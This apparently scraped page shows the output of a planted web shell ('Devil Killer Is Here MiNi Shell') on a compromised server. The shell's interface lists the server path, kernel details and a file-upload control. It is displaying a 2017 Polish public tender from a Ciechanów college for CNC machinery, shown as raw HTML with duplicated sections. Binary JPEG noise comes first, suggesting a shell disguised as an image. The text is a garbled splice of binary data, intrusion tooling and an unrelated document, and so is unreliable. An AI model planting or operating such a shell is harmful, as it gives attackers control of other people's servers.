JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170215/25818-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 25818 - 2017
              z dnia 2017-02-15 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Ciechanów: Dostarczenie, montaż i uruchomienie :
I - pionowego centrum obróbczego sterowanego numerycznie ( opis zał. nr1 / I), 
II - plotera laserowego sterowanego numerycznie ( opis zał. nr 1/ II ), 
III - tokarki sterowanej numerycznie ( opis zał. nr 1 / III ), 
do siedziby Państwowej Wyższej Szkoły Zawodowej w Ciechanowie,  ul. Narutowicza 9, 06-400 Ciechanów. 
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Państwowa Wyższa Szkoła Zawodowa w Ciechanowie, krajowy numer identyfikacyjny
              13086920800000, ul.
              ul. Narutowicza 
              9,
              06400  
              Ciechanów, woj.
              mazowieckie, państwo
              Polska, tel.
              236 722 050, e-mail
              kanclerz@pwszciechanow.edu.pl, faks
              236 722 644.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />www.pwszciechanow.edu.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br /><br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostarczenie, montaż i uruchomienie :
I - pionowego centrum obróbczego sterowanego numerycznie ( opis zał. nr1 / I), 
II - plotera laserowego sterowanego numerycznie ( opis zał. nr 1/ II ), 
III - tokarki sterowanej numerycznie ( opis zał. nr 1 / III ), 
do siedziby Państwowej Wyższej Szkoły Zawodowej w Ciechanowie,  ul. Narutowicza 9, 06-400 Ciechanów. 
<br /><b>Numer referencyjny: </b>KAG.2390-1/17<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1)	Przedmiotem zamówienia jest dostarczenie, montaż i uruchomienie: 
I - pionowego centrum obróbczego sterowanego numerycznie, 
II- plotera laserowego sterowanego numerycznie, 
III- tokarki sterowanej numerycznie,
 do siedziby Państwowej Wyższej Szkoły Zawodowej w Ciechanowie,  ul. Narutowicza 9, 06-400 Ciechanów.
2)	Szczegółowy opis przedmiotu zamówienia znajduje się w Części II SIWZ Opis Przedmiotu Zamówienia: 
SIWZ CZĘŚĆ II  Opis Przedmiotu Zamówienia - CENTRUM OBRÓBCZE,
SIWZ CZĘŚĆ II  Opis Przedmiotu Zamówienia - PLOTER LASEROWY,
SIWZ CZĘŚĆ II  Opis Przedmiotu Zamówienia - TOKARKA.
3)	Zamawiający żąda wskazania przez Wykonawcę w ofercie podwykonawców wraz z zakresem wykonywanych przez nich prac.
<br /><br /><b>II.5) Główny kod CPV: </b><br /><b> Dodatkowe kody CPV:</b>30232140-7,
                42612200-1,
                42621100-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 90<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania m.in. ;
	aktualne certyfikaty maszyn i przyrządów,
	oryginalne oprogramowanie maszyn i przyrządów pomiarowych,
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                1)	Oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o braku podstaw 
do wykluczenia, zawarte w Formularzu oferty Wzór nr 1 Części III SIWZ.
2)	Oświadczenie własne Wykonawcy potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, (zawarte w Formularzu oferty Wzór nr 1 części III SIWZ ) lub oświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
3)	W przypadku Wykonawców występujących wspólnie oświadczenie, o którym mowa w pkt 2)  składa każdy z Wykonawców. Pozostałe dokumenty mogą być złożone wspólnie.
4)	Wykaz wykonanych w okresie 2 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności Wykonawcy jest krótszy  w tym okresie, wykonał co najmniej dwie prace, odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia, na kwotę nie mniejszą niż 50 000 zł netto; (zgodnie ze Wzorem nr 2 Części III SIWZ  WYKAZ WYKONANYCH USŁUG). Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie usługi (np. referencje),
5)	Oświadczenie, że w stosunku do firmy Wykonawcy oraz członków jej Zarządu, Prokurentów i Rady Nadzorczej / Właścicieli i Współwłaścicieli, Kierownictwa, Pełnomocników, aktualnie oraz w okresie ostatnich 3 lat przed upływem terminu składania ofert nie było prowadzone jakiekolwiek postępowanie karne, karne skarbowe oraz o wykroczenie lub wykroczenie skarbowe. Wzór oświadczenia zawarty jest we wzorze nr 4 Części III SIWZ.
6)	W przypadku, gdy Wykonawca:
	występuje wspólnie z innymi Wykonawcami ubiegającymi się o udzielenie niniejszego zamówienia,
	polega na wiedzy i doświadczeniu innych podmiotów,
	powierzy część zamówienia podwykonawcom,
powinien załączyć do oferty oświadczenie że w stosunku do tych podmiotów oraz członków ich Zarządu, Prokurentów i Rady Nadzorczej / Właścicieli i Współwłaścicieli, Kierownictwa, Pełnomocników, aktualnie oraz w okresie ostatnich 3 lat przed upływem terminu składania ofert nie było prowadzone jakiekolwiek postępowanie karne, karne skarbowe oraz o wykroczenie lub wykroczenie skarbowe. Wzór oświadczenia zawarty jest we wzorze nr 5 Części III SIWZ.
7)	W przypadku Wykonawców występujących wspólnie dokument (pełnomocnictwo) ustanawiający Pełnomocnika, o którym mowa w pkt VIII 1) Części I SIWZ.
8)	Informacja o podwykonawcach oraz częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom zawarta w Formularzu oferty zgodnie ze wzorem nr 1 Części III SIWZ.
9)	Oświadczenie o wizji lokalnej terenu wykonywania usługi, zgodnie z pkt. II 4.5.
10)	zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
11)	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
12)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy PZP.
Uwaga:
Konieczne  jest złożenie kompletu wymaganych oświadczeń i dokumentów, do każdej złożonej oferty dotyczącej jednego urządzenia, jakie mają dostarczyć Wykonawcy w celu wykazania spełnienia warunków udziału w postępowaniu.
VIII.	Wykonawcy występujący wspólnie
1)	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają Pełnomocnika, zwanego w niniejszej specyfikacji Pełnomocnikiem, do reprezentowania 
ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy 
w sprawie zamówienia. W takim przypadku, do oferty należy załączyć pełnomocnictwo. 
2)	W przypadku wspólnego ubiegania się Wykonawców o udzielenie niniejszego zamówienia, spełnianie przez nich warunków udziału w postępowaniu oceniane będzie łącznie. 
3)	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	Oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o braku podstaw 
do wykluczenia, zawarte w Formularzu oferty Wzór nr 1 Części III SIWZ.
2)	Oświadczenie własne Wykonawcy potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, (zawarte w Formularzu oferty Wzór nr 1 części III SIWZ ) lub oświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
3)	W przypadku Wykonawców występujących wspólnie oświadczenie, o którym mowa w pkt 2)  składa każdy z Wykonawców. Pozostałe dokumenty mogą być złożone wspólnie.
4)	Wykaz wykonanych w okresie 2 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności Wykonawcy jest krótszy  w tym okresie, wykonał co najmniej dwie prace, odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia, na kwotę nie mniejszą niż 50 000 zł netto; (zgodnie ze Wzorem nr 2 Części III SIWZ  WYKAZ WYKONANYCH USŁUG). Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie usługi (np. referencje),
5)	Oświadczenie, że w stosunku do firmy Wykonawcy oraz członków jej Zarządu, Prokurentów i Rady Nadzorczej / Właścicieli i Współwłaścicieli, Kierownictwa, Pełnomocników, aktualnie oraz w okresie ostatnich 3 lat przed upływem terminu składania ofert nie było prowadzone jakiekolwiek postępowanie karne, karne skarbowe oraz o wykroczenie lub wykroczenie skarbowe. Wzór oświadczenia zawarty jest we wzorze nr 4 Części III SIWZ.
6)	W przypadku, gdy Wykonawca:
	występuje wspólnie z innymi Wykonawcami ubiegającymi się o udzielenie niniejszego zamówienia,
	polega na wiedzy i doświadczeniu innych podmiotów,
	powierzy część zamówienia podwykonawcom,
powinien załączyć do oferty oświadczenie że w stosunku do tych podmiotów oraz członków ich Zarządu, Prokurentów i Rady Nadzorczej / Właścicieli i Współwłaścicieli, Kierownictwa, Pełnomocników, aktualnie oraz w okresie ostatnich 3 lat przed upływem terminu składania ofert nie było prowadzone jakiekolwiek postępowanie karne, karne skarbowe oraz o wykroczenie lub wykroczenie skarbowe. Wzór oświadczenia zawarty jest we wzorze nr 5 Części III SIWZ.
7)	W przypadku Wykonawców występujących wspólnie dokument (pełnomocnictwo) ustanawiający Pełnomocnika, o którym mowa w pkt VIII 1) Części I SIWZ.
8)	Informacja o podwykonawcach oraz częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom zawarta w Formularzu oferty zgodnie ze wzorem nr 1 Części III SIWZ.
9)	Oświadczenie o wizji lokalnej terenu wykonywania usługi, zgodnie z pkt. II 4.5.
10)	zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
11)	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
12)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy PZP.
Uwaga:
Konieczne  jest złożenie kompletu wymaganych oświadczeń i dokumentów, do każdej złożonej oferty dotyczącej jednego urządzenia, jakie mają dostarczyć Wykonawcy w celu wykazania spełnienia warunków udziału w postępowaniu.
VIII.	Wykonawcy występujący wspólnie
1)	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają Pełnomocnika, zwanego w niniejszej specyfikacji Pełnomocnikiem, do reprezentowania 
ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy 
w sprawie zamówienia. W takim przypadku, do oferty należy załączyć pełnomocnictwo. 
2)	W przypadku wspólnego ubiegania się Wykonawców o udzielenie niniejszego zamówienia, spełnianie przez nich warunków udziału w postępowaniu oceniane będzie łącznie. 
3)	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Warunkiem udziału w postępowaniu jest wniesienie wadium na okres związania ofertą.
Kwota/wartość: jaką należy wpłacić na konto Zamawiającego w przypadku  złożenia oferty na poszczególne części  zamówienia :
W przypadku złożenia oferty na ZAMÓWIENIE NR:
I - pionowego centrum obróbczego sterowanego numerycznie ( opis zał. nr1 / I),- 2 400 zł (słownie: dwa tysiące czterysta złotych 00/100); 
II - plotera laserowego sterowanego numerycznie ( opis zał. nr 1/ II ), - 900 zł (słownie: dziewięćset złotych 00/100); 
III - tokarki sterowanej numerycznie ( opis zał. nr 1 / III ), - 1500 zł (słownie: jeden tysiąc pięćset złotych 00/100); 
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
